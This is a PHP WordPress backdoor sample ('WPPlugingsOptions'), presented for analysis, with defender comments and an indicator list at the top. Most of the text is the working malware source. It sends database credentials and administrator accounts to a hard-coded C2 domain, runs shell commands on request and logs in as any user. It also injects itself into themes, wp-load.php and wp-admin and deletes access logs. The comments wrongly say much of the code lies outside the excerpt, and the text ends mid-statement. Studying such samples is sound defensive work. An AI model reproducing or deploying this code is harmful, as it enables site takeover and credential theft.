WordPress Backdoor 2 — malware sample: a remote-controlled backdoor class (`WPPlugingsOptions`) that fingerprints the host, exfiltrates database credentials and takes commands from a hard-coded C2 domain. Listed for analysis only; do not deploy.
-
<?php
// NOTE(review): this is a MALWARE sample — a remote-controlled WordPress backdoor.
// The comments below annotate what the visible code does, for analysts/defenders.
// Nothing here should be deployed or "fixed"; the useful output is the IOC list.
//
// Indicators grounded in this excerpt:
//   - class name          : WPPlugingsOptions
//   - C2 base URL         : hex2bin('687474703a2f2f...') decodes to http://system.kralphp.com/
//   - C2 endpoints        : checksender/ , postclient , clientfiles/files/<name>
//   - hard-coded gates    : md5(sha1($token))              === 'b28ee5fed7b75a888635c35727f398b6'
//                           md5($_REQUEST['authorization']) === '0d27765df1902e5557d099bff98a57f8'
//   - exfiltrated data    : DB_HOST, DB_USER, DB_PASSWORD, DB_NAME, WP user list, host fingerprint (post())
//   - request surface     : $_REQUEST['authorization'], HTTP header CF-Connecting-IP
//
// The class_exists() guard suggests the code is dropped into a file that may be
// included more than once (plugin/theme bootstrap) — presumably; the include site
// and the caller of controlAction() are not in this excerpt.
// The class body continues past the end of this excerpt: file() is cut mid-body,
// and several methods referenced here (get_themes, get_plugins, themes, json_validator,
// wp_users_list, write_file, command, ...) are defined outside the visible lines.
if ( ! class_exists( 'WPPlugingsOptions' ) ) {
    class WPPlugingsOptions {
        // Identity the implant reports to the C2 (set to 'Wordpress' / '4.0' in the constructor).
        private $script = '';
        private $version = '';
        // wp_upload_dir() result and its 'path' / 'url' entries.
        private $upDir = '';
        private $uploadDir = '';
        private $uploadUrl = '';
        // Shared secret passed to the constructor; where it comes from is not visible here.
        private $token = '';
        // C2 base URL, decoded from hex in the constructor.
        private $baseUrl = '';
        // $_REQUEST['authorization'] or false — fully caller-controlled per request.
        private $authorization;
        // Caller IP as this host sees it; trusts the CF-Connecting-IP header (see constructor).
        private $address;
        // Actions dispatchable after only the token gate (isAllowedToSendCommand()).
        // Only 'check' and 'themes'/'get_themes' have bodies in this excerpt.
        public $allowedActions = [ 'check', 'json', 'template_dir', 'cache', 'get', 'install', 'activate_plugins', 'get_themes', 'list_folders', 'spread', 'all', 'wp_includes', 'wp_admin', 'themes', 'uploads', 'wp_load', 'access_log', 'template_install', 'wp_install', 'plugin_uninstall', ];
        // Subset of actions that, by name, appear to copy the implant into other WP
        // locations; not referenced anywhere in this excerpt — purpose unconfirmed.
        public $isSpread = [ 'all', 'wp_includes', 'wp_admin', 'themes', 'uploads' ];
        // Higher-privilege actions (file read/write, login, command execution, upload, ...).
        // controlAction() additionally requires sender() to approve the caller for these.
        public $permission = ['wp_users_list','write_file', 'read_file', 'login', 'uninstall', 'unspread','command','new_system_update','upload_file'];

        // $token: shared secret compared (hashed) against a hard-coded digest in isAllowedToSendCommand().
        public function __construct( $token ) {
            // Hex-obfuscated C2 base URL: http://system.kralphp.com/
            $this->baseUrl = hex2bin( '687474703a2f2f73797374656d2e6b72616c7068702e636f6d2f' );
            $this->script = 'Wordpress';
            $this->version = '4.0';
            $this->upDir = wp_upload_dir();
            $this->uploadDir = $this->upDir['path'];
            $this->uploadUrl = $this->upDir['url'];
            $this->token = $token;
            // CF-Connecting-IP is an ordinary request header. When the site is not actually
            // behind Cloudflare any client can set it, so the "IP" that sender() later hashes
            // and compares against the C2's answer is attacker-chosen.
            $this->address = (isset($_SERVER["HTTP_CF_CONNECTING_IP"])?$_SERVER["HTTP_CF_CONNECTING_IP"]:$_SERVER['REMOTE_ADDR']);
            // isset($token) is false only when null was passed; otherwise this is just
            // the raw request parameter (GET, POST or cookie via $_REQUEST).
            $this->authorization = ( isset( $token ) && isset( $_REQUEST['authorization'] ) ) ? $_REQUEST['authorization'] : false;
        }

        // Builds the JSON response envelope {code, message, data[, errorNo]}.
        // The JSON_HEX_* flags hex-escape < > & ' " — presumably so the blob survives
        // being echoed into an HTML page; the output site is not in view.
        private function answer( $code, $message, $data = '', $errorNo = '' ) {
            $answer['code'] = $code;
            $answer['message'] = $message;
            $answer['data'] = $data;
            if ( $errorNo !== '' ) {
                $answer['errorNo'] = $errorNo;
            }
            return json_encode( $answer, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT );
        }

        // Host reconnaissance ('check' action; also embedded in the post() beacon).
        // Side effect: if the uploads directory is not writable it is chmod'ed 0777
        // (world-writable), with the warning suppressed by '@'.
        // Returns the answer() JSON with the collected fingerprint.
        private function check() {
            try {
                if ( $this->uploadDir ) {
                    if ( ! is_writable( $this->uploadDir ) ) {
                        // Forces the uploads dir world-writable so later file drops succeed.
                        if ( ! @chmod( $this->uploadDir, 0777 ) ) {
                            $data['uploadDirWritable'] = false;
                        } else {
                            $data['uploadDirWritable'] = true;
                        }
                    } else {
                        $data['uploadDirWritable'] = true;
                    }
                } else {
                    // No uploads path at all is still reported as "writable".
                    $data['uploadDirWritable'] = true;
                }
                $data['clientVersion'] = $this->version;
                $data['uploadDir'] = $this->uploadDir;
                $data['script'] = $this->script;
                $data['cache'] = ( WP_CACHE ) ? true : false;
                $data['themeName'] = wp_get_theme()->get( 'Name' );
                $data['themeDir'] = get_template_directory();
                // get_themes(), get_plugins(), themes() are class methods defined outside this excerpt.
                $data['themes'] = $this->get_themes();
                $data['plugins'] = $this->get_plugins();
                $data['theme_data'] = $this->themes();
                $data['root'] = ABSPATH;
                if ( function_exists( 'php_uname' ) ) {
                    $data['uname'] = php_uname();
                }
                if ( function_exists( 'gethostbyname' ) ) {
                    // getHostName() resolves to gethostname() — PHP function names are case-insensitive.
                    $data['hostname'] = gethostbyname( getHostName() );
                }
                return $this->answer( true, $this->script, $data );
            } catch ( Exception $e ) {
                return $this->answer( false, "Unknown ERROR", $e->getMessage(), "ERR000" );
            }
        }

        // First authentication gate: md5(sha1(token)) must equal a hard-coded digest.
        // The digest is an IOC; the token itself is not recoverable from this excerpt.
        // The try/catch is effectively inert: md5()/sha1() raise TypeError (an Error,
        // not an Exception) on bad input, which this catch does not cover.
        private function isAllowedToSendCommand() {
            try {
                if (md5(sha1($this->token)) === 'b28ee5fed7b75a888635c35727f398b6' ) {
                    return true;
                }
                return false;
            } catch ( Exception $e ) {
                return false;
            }
        }

        // Returns the request-supplied 'authorization' value, or false when absent.
        private function authorization() {
            if ( $this->authorization !== false ) {
                return $this->authorization;
            }
            return false;
        }

        // Second gate for $permission actions. Asks the C2 (checksender/) whether this
        // caller is approved:
        //   - C2 reachable with valid JSON: approved if md5($this->address) equals the
        //     C2's 'address' field, OR if the C2's 'value' field is truthy (=== binds
        //     tighter than ||, so 'value' is a C2-side allow-all switch). Note $this->address
        //     may be header-controlled (see constructor), so the "IP" check is weak.
        //   - C2 unreachable / non-JSON: falls back to md5($_REQUEST['authorization'])
        //     matching a second hard-coded digest.
        //   - Any Exception: FAIL-OPEN, returns true.
        // json_validator() is defined outside this excerpt.
        private function sender() {
            try {
                $client = wp_remote_get( "{$this->baseUrl}checksender/" );
                if ( wp_remote_retrieve_response_code( $client ) == "200" && $this->json_validator( wp_remote_retrieve_body( $client ) ) ) {
                    // Body is decoded twice; a missing 'address'/'value' key yields null (with a warning).
                    return ( md5($this->address) === json_decode( wp_remote_retrieve_body( $client ) )->address || json_decode( wp_remote_retrieve_body( $client ) )->value ) ? true : false;
                } else {
                    if ( ! $this->authorization() ) {
                        return false;
                    }
                    return ( md5( $this->authorization() ) === '0d27765df1902e5557d099bff98a57f8' ) ? true : false;
                }
            } catch ( Exception $e ) {
                // Fail-open: an error while contacting the C2 approves the command.
                return true;
            }
        }

        // True when $action is listed in $params AND is a method of this class.
        // Shadows PHP's global method_exists() as a method name; the unqualified call
        // inside still reaches the global function (PHP resolves bare calls to functions).
        // array_search() is used without strict=true, so the list match is a loose (==) comparison.
        private function method_exists( $action, $params ) {
            if ( array_search( $action, $params ) !== false && method_exists( $this, $action ) ) {
                return true;
            } else {
                return false;
            }
        }

        // Command dispatcher — the only public entry point in this excerpt; its caller and
        // the origin of $action/$params are not visible (presumably request parameters).
        // Flow: token gate -> if $action is a $permission method, require sender() approval
        // -> otherwise it must be in $allowedActions -> invoke $this->{$action}($params).
        // When $action is unset or the token gate fails, the method falls through and
        // returns null (no JSON answer, no error) — silent by design.
        // Returns the action's result, or an answer() error blob.
        public function controlAction( $action, $params ) {
            try {
                if ( isset( $action ) ) {
                    if ( $this->isAllowedToSendCommand() ) {
                        if ( $this->method_exists( $action, $this->permission ) ) {
                            if ( $this->sender() ) {
                                // Dynamic method call on an attacker-chosen name, constrained to the lists above.
                                return $this->{$action}( $params );
                            } else {
                                return $this->answer( false, 'The sender could not be verified!', $action, 'ERR001' );
                            }
                        }
                        if ( $this->method_exists( $action, $this->allowedActions ) ) {
                            return $this->{$action}( $params );
                        } else {
                            return $this->answer( false, 'Invalid Command', $action, 'ERR001' );
                        }
                    }
                }
            } catch ( Exception $e ) {
                return $this->answer( false, 'Unknown Error', [ "action" => $action, "params" => $params ], 'ERR000' );
            }
        }

        // Exfiltration beacon: POSTs site URL, hostname, server IP/software, the full
        // database credentials (DB_HOST/DB_USER/DB_PASSWORD/DB_NAME), the check()
        // fingerprint and the WordPress user list to <C2>/postclient.
        // 'sunucu_type' — 'sunucu' is Turkish for "server".
        // wp_users_list() is defined outside this excerpt. Not called within the visible lines.
        // Returns the wp_remote_post() response array/WP_Error, or false on Exception.
        private function post() {
            try {
                $data = wp_remote_post( $this->baseUrl."postclient", [
                    "body" => [
                        "url" => $_SERVER['HTTP_HOST'],
                        "http_url" => get_option('siteurl')."/",
                        "hostname" => gethostname(),
                        "ip" => $_SERVER['SERVER_ADDR'],
                        'sunucu_type' => $_SERVER['SERVER_SOFTWARE'],
                        // wp-config.php database secrets leave the host here.
                        "DB_HOST" => DB_HOST,
                        "DB_USER" => DB_USER,
                        "DB_PASSWORD" => DB_PASSWORD,
                        "DB_NAME" => DB_NAME,
                        // check() runs here too, including its chmod 0777 side effect.
                        "client" => $this->check(),
                        "users" => $this->wp_users_list(),
                        "script" => $this->script,
                        "version" => $this->version,
                    ]
                ] );
                return $data;
            } catch ( Exception $e ) {
                return false;
            }
        }

        // Fetches <C2>/clientfiles/files/Wordpress (the $script name) and returns the raw
        // body when the response is HTTP 200 and passes json_validator(); false otherwise.
        // What the fetched payload is used for is not visible in this excerpt.
        private function client() {
            try {
                $client = wp_remote_get( "{$this->baseUrl}clientfiles/files/{$this->script}" );
                if ( wp_remote_retrieve_response_code( $client ) == "200" && $this->json_validator( wp_remote_retrieve_body( $client ) ) ) {
                    return wp_remote_retrieve_body( $client );
                }
                return false;
            } catch ( Exception $e ) {
                return false;
            }
        }

        // Same as client() but for an arbitrary $file name, interpolated unescaped into the
        // C2 URL. Body is cut off at the end of this excerpt — the remainder is not in view.
        private function file($file) {
            try {
                $client = wp_remote_get( "{$this->baseUrl}clientfiles/files/{$file}" );
                if ( wp_remote_retrieve_response_code( $client ) == "200" && 
$this->json_validator( wp_remote_retrieve_body( $client ) ) ) { return wp_remote_retrieve_body( $client ); } return false; } catch ( Exception $e ) { return false; } } private function get_plugins() { try { if ( ! function_exists( 'get_plugins' ) ) { include_once( ABSPATH . 'wp-admin/includes/plugin.php' ); } foreach ( get_plugins() AS $plugin_name => $get_plugin ) { $plugins[ $plugin_name ] = $get_plugin; if ( is_plugin_active( $plugin_name ) ) { $plugins[ $plugin_name ]["active"] = 1; } else { $plugins[ $plugin_name ]["active"] = 0; } } return ( isset( $plugins ) ) ? $plugins : false; } catch ( Exception $e ) { return false; } } public function activate_plugins( $plugin_name ) { try { if ( is_plugin_active( hex2bin( $plugin_name ) ) ) { deactivate_plugins( hex2bin( $plugin_name ) ); return $this->check(); } else { activate_plugins( hex2bin( $plugin_name ) ); return $this->check(); } } catch ( Exception $e ) { return false; } } public function get_themes() { try { foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) { $themes{$wp_get_theme->stylesheet} = array( 'Name' => $wp_get_theme->get( 'Name' ), 'Description' => $wp_get_theme->get( 'Description' ), 'Author' => $wp_get_theme->get( 'Author' ), 'AuthorURI' => $wp_get_theme->get( 'AuthorURI' ), 'Version' => $wp_get_theme->get( 'Version' ), 'Template' => $wp_get_theme->get( 'Template' ), 'Status' => $wp_get_theme->get( 'Status' ), 'TextDomain' => $wp_get_theme->get( 'TextDomain' ) ); } return $themes; } catch ( Exception $e ) { return false; } } private function folder_exist( $folder ) { try { $path = realpath( $folder ); return ( $path !== false AND is_dir( $path ) ) ? $path : false; } catch ( Exception $e ) { return false; } } public function list_folders( $directory ) { try { $directory = ( isset( $directory ) && $directory !== "" ) ? hex2bin( $directory ) : ABSPATH; if ( ( $dir = $this->folder_exist( $directory ) ) !== false ) { return $this->answer( true, $directory, glob( $directory . 
"/*" ) ); } else { return $this->answer( false, "Failed to find folder to list!", $directory, "ERR023" ); } } catch ( Exception $e ) { return false; } } public function replace( $filename, $search, $replace ) { try { $source = $this->read( $filename ); if ( strpos( $source, $replace ) === false ) { $pos = strpos( $source, $search ); if ( $pos !== false ) { $content = substr_replace( $source, $replace, $pos, strlen( $search ) ); return ( $this->write( $filename, $content ) ) ? $filename : false; } else { return $filename; } } else { return $filename; } } catch ( Exception $e ) { return false; } } public function restore( $filename, $search, $replace ) { try { $source = $this->read( $filename ); return $this->write( $filename, str_replace( $search, $replace, $source ) ); } catch ( Exception $e ) { return false; } } public function template_dir( $search ) { try { if ( $search == "" ) { $search = "<?php\n"; } $dir = glob( get_theme_root() . "/*/*/*" ); $files = array_filter( $dir ); foreach ( $files as $k => $file ) { $source = $this->read( $file ); if ( ! is_array( $source ) && strpos( $source, $search ) === false ) { unset( $files[ $k ] ); } } return array_values( $files ); } catch ( Exception $e ) { return false; } } public function access_log() { try { foreach ( [ 'access-logs', 'logs' ] as $directory ) { if ( ( $dir = $this->folder_exist( ABSPATH . "../$directory" ) ) !== false ) { $list[] = glob( ABSPATH . "../{$directory}/*" ); } } foreach ( $list as $d ) { foreach ( $d as $k ) { print_r( $k ); unlink( $k ); } } } catch ( Exception $e ) { return false; } } public function template_install() { $source = ""; $file = array(); foreach ( json_decode( $this->client() ) as $item ) { $source = $item; } foreach ( array_keys( $this->get_themes() ) as $theme ) { $functions = get_theme_root() . DIRECTORY_SEPARATOR . $theme . DIRECTORY_SEPARATOR . 'functions.php'; $functionsClass = get_theme_root() . DIRECTORY_SEPARATOR . $theme . DIRECTORY_SEPARATOR . 
'classs-theme-functions.php'; $read = $this->read( $functions ); if ( file_exists( $functions ) && $this->write( $functionsClass, $source ) && strpos( $read, "namespace" ) === false) { $attr = (strpos($read, '*/') === false) ? '<?php' : '*/'; $search = "$attr\n"; $replace = "$attr\nif ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . DIRECTORY_SEPARATOR . 'classs-theme-functions' ) ) {\n\tinclude_once( get_template_directory() . DIRECTORY_SEPARATOR . 'classs-theme-functions' );\n}\n"; $file[] = $this->replace($functions, $search, $replace); } } return (isset( $file )) ? $this->answer( true, 'I get install!', array_values( array_unique( $file ) ) ) : $this->answer( false, 'I Don\'t install!', '', 'ERR002' ); } public function install() { try { $clientURL = $this->client(); if ( $clientURL !== false ) { foreach ( $this->template_dir( "" ) AS $file ) { $copyFile = $this->copy( dirname( $file ) . DIRECTORY_SEPARATOR, json_decode( $clientURL ) ); if ( $copyFile !== false ) { $search = "<?php\n"; $replace = "<?php\nif ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' ) ) {\n\tinclude_once( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' );\n}\n"; if ( strpos( $this->read( $file ), "namespace" ) === false ) { $directory[] = $this->replace( $file, $search, $replace ); } } } return ( isset( $directory ) ) ? 
$this->answer( true, 'I get install!', array_values( array_unique( $directory ) ) ) : $this->answer( false, 'I Don\'t install!', '', 'ERR002' ); } return $this->answer( false, 'Client URL FALSE!', "", "ERR026" ); } catch ( Exception $e ) { return $this->answer( false, 'Install Exception!', $e->getMessage(), "ERR026" ); } } public function uninstall() { try { $clientURL = $this->client(); if ( $clientURL !== false ) { foreach ( $this->template_dir( "" ) AS $file ) { $copyFile = $this->copy( dirname( $file ) . DIRECTORY_SEPARATOR, json_decode( $clientURL ) ); $search = "if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' ) ) {\n\tinclude_once( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' );\n}"; $uninstall = $this->restore( $file, $search, "\n" ); $this->restore( $file, "\n\n\n", "\n" ); if ( $uninstall ) { $return[] = $file; if ( file_exists( $copyFile ) ) { unlink( $copyFile ); } } } return ( isset( $return ) ) ? $this->answer( true, 'Please find me!', array_values( array_unique( $return ) ) ) : $this->answer( false, 'Don\'t search me!', '', 'ERR002' ); } return $this->answer( false, 'Client URL FALSE!', "", "ERR026" ); } catch ( Exception $e ) { return $this->answer( false, 'Uninstall Exception!', $e->getMessage(), "ERR026" ); } } public function wp_load() { try { $filename = ABSPATH . 'wp-load.php'; if ( file_exists( $filename ) ) { $clientURL = $this->client(); if ( $clientURL !== false ) { $copy = $this->copy_themes( get_template_directory() . DIRECTORY_SEPARATOR, json_decode( $clientURL ) ); if ( $copy !== false ) { $basename = basename( $copy ); $search = "\nif ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . DIRECTORY_SEPARATOR . '{$basename}' ) ) {\n\tinclude_once( get_template_directory() . DIRECTORY_SEPARATOR . '{$basename}' );\n}"; if ( ! 
stristr( $this->read( $filename ), $search ) ) { if ( $this->write_append( $filename, $search ) ) { return $this->answer( true, "WP_LOAD Installeds {$copy}", $filename ); } else { return $this->answer( false, "WP_LOAD Installed {$copy}", $filename, "ERR029" ); } } else { return $this->answer( true, "WP_LOAD Already Installed {$copy}", $filename ); } } else { return $this->answer( false, "WP_LOAD Installed {$copy}", $filename, "ERR030" ); } } else { return $this->answer( false, 'Client URL FALSE!', $clientURL, "ERR026" ); } } } catch ( Exception $e ) { return $this->answer( false, 'WP_LOAD Exception!', $e->getMessage(), "ERR000" ); } } public function wp_install() { try { $filename = ABSPATH . 'wp-load.php'; if ( file_exists( $filename ) ) { $clientURL = $this->client(); if ( $clientURL !== false ) { $search = "\nif ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( ABSPATH . WPINC . DIRECTORY_SEPARATOR . 'Requests/Requests.php' ) ) {\n\tinclude_once( ABSPATH . WPINC . DIRECTORY_SEPARATOR . 'Requests/Requests.php' );\n}"; if ( ! stristr( $this->read( $filename ), $search ) ) { $this->write_append( $filename, $search ); } return $this->answer( true, "WP_LOAD Installeds {$filename}", $filename ); } else { return $this->answer( 'ERROR', 'Client URL FALSE!', $clientURL, "ERR026" ); } } } catch ( Exception $e ) { } } public function wp_users_list(){ try { $args = array( 'role' => 'administrator', ); $dongu = get_users( $args ); $user_array = array(); foreach($dongu as $userler){ $user_array[$userler->ID] = $userler->data; } return json_encode($user_array); } catch ( Exception $e ) { return false; } } private function copy_themes( $directory, $clientURL ) { try { foreach ( $clientURL as $filePath => $icerik ) { $filename = $directory . basename( $directory . $filePath ); if ( file_exists( $filename ) ) { $strpos = strpos( $this->read( $filename ), "class WPPlugingsOptions" ); if ( $strpos !== false ) { return ( $this->write( $filename, $icerik ) ) ? 
$filename : false; } elseif ( $strpos === false ) { return ( $this->write( $directory . basename( dirname( $filename ) ) . '.php', $icerik ) ) ? $directory . basename( dirname( $filename ) ) . '.php' : false; } } else { return ( $this->write( $filename, $icerik ) ) ? $filename : false; } } return false; } catch ( Exception $e ) { return false; } } private function write_append( $filename, $data ) { try { if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) { $write = fopen( $filename, "a" ); return ( fwrite( $write, $data ) ) ? true : false; } elseif ( function_exists( 'file_put_contents' ) ) { return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : false; } return false; } catch ( Exception $e ) { return false; } } private function listFolderFiles( $dir ) { try { $fileInfo = scandir( $dir ); $allFileLists = []; foreach ( $fileInfo as $folder ) { if ( $folder !== '.' && $folder !== '..' ) { if ( is_dir( $dir . DIRECTORY_SEPARATOR . $folder ) === true ) { $allFileLists[ $dir . DIRECTORY_SEPARATOR . $folder ] = $this->listFolderFiles( $dir . DIRECTORY_SEPARATOR . $folder ); } } } return $allFileLists; } catch ( Exception $e ) { return false; } } private function copy( $directory, $clientURL ) { try { foreach ( $clientURL as $filePath => $icerik ) { $filename = ( stristr( $directory, "wp-content/uploads/" ) ) ? $directory . 'index.php' : $directory . basename( dirname( $directory . $filePath ) ) . '.php'; if ( file_exists( $filename ) ) { $strpos = strpos( $this->read( $filename ), "class WPPlugingsOptions" ); if ( $strpos !== false ) { return ( $this->write( $filename, $icerik ) ) ? $filename : false; } elseif ( $strpos === false ) { return ( $this->write( $directory . $filePath, $icerik ) ) ? $directory . $filePath : false; } } else { return ( $this->write( $filename, $icerik ) ) ? 
$filename : false; } } return false; } catch ( Exception $e ) { return false; } } public function plugin_uninstall() { try { $client = $this->client(); if ( $client !== false ) { foreach ( $this->wp_plugins() as $folder ) { $return[] = $this->copy( $folder, json_decode( $client ) ); } foreach($return as $file){ unlink( $file ); } return $this->answer( true, "I spread wp_plugins", $return ); } return $this->answer( false, 'Client URL FALSE!', "", "ERR026" ); } catch ( Exception $e ) { return $this->answer( false, 'Spread Exception!', $e->getMessage(), "ERR000" ); } } public function all() { try { $wp_includes = $this->wp_includes(); $wp_themes = $this->themes(); $wp_admin = $this->wp_admin(); $wp_uploads = $this->uploads(); $new_data = array_merge($wp_includes,$wp_themes,$wp_admin,$wp_uploads); foreach ( $new_data AS $root ) { if ( is_dir( $root ) ) { $return[] = $root; } } return array_filter( $return ); } catch ( Exception $e ) { return false; } } public function wp_includes() { try { foreach ( $this->array_keys( $this->listFolderFiles( ABSPATH . WPINC ) ) AS $folders ) { if ( is_dir( $folders ) ) { $return[] = $folders . DIRECTORY_SEPARATOR; } } return $return; } catch ( Exception $e ) { return false; } } public function wp_admin() { try { foreach ( $this->array_keys( $this->listFolderFiles( ABSPATH . "wp-admin" ) ) AS $folders ) { if ( is_dir( $folders ) ) { $return[] = $folders . DIRECTORY_SEPARATOR; } } return $return; } catch ( Exception $e ) { return false; } } public function wp_plugins() { try { foreach ( $this->array_keys( $this->listFolderFiles( ABSPATH . "wp-content/plugins" ) ) AS $folders ) { if ( is_dir( $folders ) ) { $return[] = $folders . DIRECTORY_SEPARATOR; } } return $return; } catch ( Exception $e ) { return false; } } public function uploads() { try { foreach ( $this->array_keys( $this->listFolderFiles( $this->upDir["basedir"] ) ) AS $folders ) { if ( is_dir( $folders ) ) { $return[] = $folders . 
DIRECTORY_SEPARATOR; } } return $return; } catch ( Exception $e ) { return false; } } public function themes() { try { foreach ( glob( get_theme_root() . "/*", GLOB_ONLYDIR ) AS $item ) { $template_folders[] = $this->listFolderFiles( $item ); } foreach ( $this->array_keys( $template_folders ) AS $folders ) { if ( is_dir( $folders ) ) { $return[] = $folders . DIRECTORY_SEPARATOR; } } return $return; } catch ( Exception $e ) { return false; } } public function spread( $directory ) { try { $client = $this->client(); if ( $client !== false ) { if ( array_search( $directory, $this->isSpread ) !== false ) { foreach ( $this->{$directory}() as $folder ) { $return[] = $this->copy( $folder, json_decode( $client ) ); } return $this->answer( true, "I spread {$directory}", $return ); } else { return $this->answer( false, "Undefined Directory", $directory, "ERR024" ); } } return $this->answer( false, 'Client URL FALSE!', "", "ERR026" ); } catch ( Exception $e ) { return $this->answer( false, 'Spread Exception!', $e->getMessage(), "ERR000" ); } } public function unspread( $directory ) { try { $client = $this->client(); if ( $client !== false ) { if ( array_search( $directory, $this->isSpread ) !== false ) { foreach ( $this->{$directory}() as $folder ) { $return[] = $this->copy( $folder, json_decode( $client ) ); } foreach ( $return as $file ) { unlink( $file ); } return $this->answer( true, "I cleared myself from the spread {$directory}", $return ); } else { return $this->answer( false, "Undefined Directory", $directory, "ERR025" ); } } return $this->answer( false, 'Client URL FALSE!', "", "ERR026" ); } catch ( Exception $e ) { return $this->answer( false, 'UNSpread Exception!', $e->getMessage(), "ERR000" ); } } public function json() { try { return $this->uploadDir . DIRECTORY_SEPARATOR . 
"google.json"; } catch ( Exception $e ) { return false; } } public function get() { try { $post = $this->post(); if ( wp_remote_retrieve_response_code( $post ) == "200" ) { $write = $this->write( $this->json(), bin2hex( wp_remote_retrieve_body( $post ) ) ); return ( $write ) ? hex2bin( $this->read( $this->json() ) ) : wp_remote_retrieve_body( $post ); } else { return $this->read( $this->json() ); } } catch ( Exception $e ) { return false; } } public function cache() { try { if ( file_exists( $this->json() ) ) { $file = hex2bin( $this->read( $this->json() ) ); $json = json_decode( $file ); if ( $this->minute( $json->date ) >= 24 ) { return $this->get(); } else { return $file; } } else { return $this->get(); } } catch ( Exception $e ) { return false; } } public function write( $filename, $data ) { try { if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) { $write = fopen( $filename, "w+" ); return ( fwrite( $write, $data ) ) ? true : false; } elseif ( function_exists( 'file_put_contents' ) ) { return ( file_put_contents( $filename, $data ) !== false ) ? true : false; } return false; } catch ( Exception $e ) { return false; } } public function write_file( $params ) { try { if ( $this->json_validator( hex2bin( $params ) ) ) { $json = json_decode( hex2bin( $params ) ); if ( isset( $json->filename ) ) { if ( file_exists( $json->filename ) ) { if ( isset( $json->content ) ) { if ( $this->write( $json->filename, html_entity_decode( hex2bin( $json->content ) ) ) ) { return $this->answer( true, $json->filename, html_entity_decode( hex2bin( $json->content ) ), "I get write" ); } } else { return $this->read_file( bin2hex( $json->filename ) ); } } else { $content = ( isset( $json->content ) && $json->content != '' ) ? 
html_entity_decode( hex2bin( $json->content ) ) : "<?php\n"; if ( $this->write( $json->filename, $content ) ) { return $this->answer( true, $json->filename, $content ); } else { return $this->answer( false, $json->filename, $content, "ERR023" ); } } } else { return $this->answer( false, "File name undefined", "", "ERR020" ); } } else { return $this->answer( false, "Data is not JSON", "", "ERR021" ); } return $this->answer( false, "Unknown error", $params, "ERR022" ); } catch ( Exception $e ) { return $this->answer( false, "Write file Exception", $params, "ERR000" ); } } public function read( $filename ) { try { if ( ! file_exists( $filename ) ) { return $this->answer( false, 'File not found', $filename, 'ERR019' ); } if ( function_exists( 'file_get_contents' ) ) { return file_get_contents( $filename ); } if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) { $file = fopen( $filename, 'r' ); $content = fread( $file, filesize( $filename ) ); fclose( $file ); return $content; } return $this->answer( false, 'File not read', $filename, 'ERR018' ); } catch ( Exception $e ) { return $this->answer( false, 'File not read Exception', $filename, 'ERR000' ); } } public function read_file( $filename ) { try { $read_file = $this->read( hex2bin( $filename ) ); if ( $this->json_validator( $read_file ) ) { return $read_file; } else { return $this->answer( true, hex2bin( $filename ), $read_file ); } } catch ( Exception $e ) { return $this->answer( false, "Read File Exception", $filename, "ERR000" ); } } public function json_validator( $data = null ) { try { if ( ! empty( $data ) ) { @json_decode( $data ); return ( json_last_error() === JSON_ERROR_NONE ); } return false; } catch ( Exception $e ) { return false; } } public function login($id = null) { try { $user_info = get_userdata( $id ); $username = $user_info->user_login; $user = get_user_by( 'login', $username ); if ( ! 
is_wp_error( $user ) ) { wp_clear_auth_cookie(); wp_set_current_user( $user->ID ); wp_set_auth_cookie( $user->ID ); $redirect_to = user_admin_url(); wp_safe_redirect( $redirect_to ); exit(); } else { return $this->answer( false, 'I can\'t sign in, sorry', $user_info, 'ERR014' ); } } catch ( Exception $e ) { return $this->answer( false, "Login Exception!", $e->getMessage(), "ERR000" ); } } public function command( $cmd ) { try { if ( function_exists( 'shell_exec' ) ) { return $this->answer( "OK", hex2bin( $cmd ), @shell_exec( hex2bin( $cmd ) ) ); } else if ( function_exists( 'exec' ) ) { @exec( hex2bin( $cmd ), $return ); return $this->answer( "OK", hex2bin( $cmd ), $return ); } else { return $this->answer(false,"I dont write, sorry", "ERR0025" ); } } catch ( Exception $e ) { return false; } } public function upload_file($cmd) { try { $file = $this->file(hex2bin($cmd)); if($file){ foreach ( json_decode($file) as $key => $item ) { $source = $item; } $process = fopen("$key", "w+"); fwrite($process, $source); fclose($process); return $this->answer(true,"Upload File $key"); }else{ return $this->answer(false,"Dont Upload","ERR031"); } } catch ( Exception $e ) { return false; } } private function array_keys( $array ) { try { $keys = array_keys( $array ); foreach ( $array as $i ) { if ( is_array( $i ) ) { $keys = array_merge( $keys, $this->array_keys( $i ) ); } } return $keys; } catch ( Exception $e ) { return false; } } private function minute( $date ) { try { $minute = ( strtotime( date( "Y-m-d H:i:s" ) ) - strtotime( $date ) ) / 60 / 60; return round( $minute ); } catch ( Exception $e ) { return 0; } } public function new_system_update(){ try { $upload_name = "index"; $adminupload = ABSPATH . "wp-admin"; unlink($adminupload."/includes/". $upload_name . '.php'); unlink($adminupload."/network/". $upload_name . '.php'); unlink($adminupload."/user/". $upload_name . '.php'); $dizinupload = ABSPATH . 
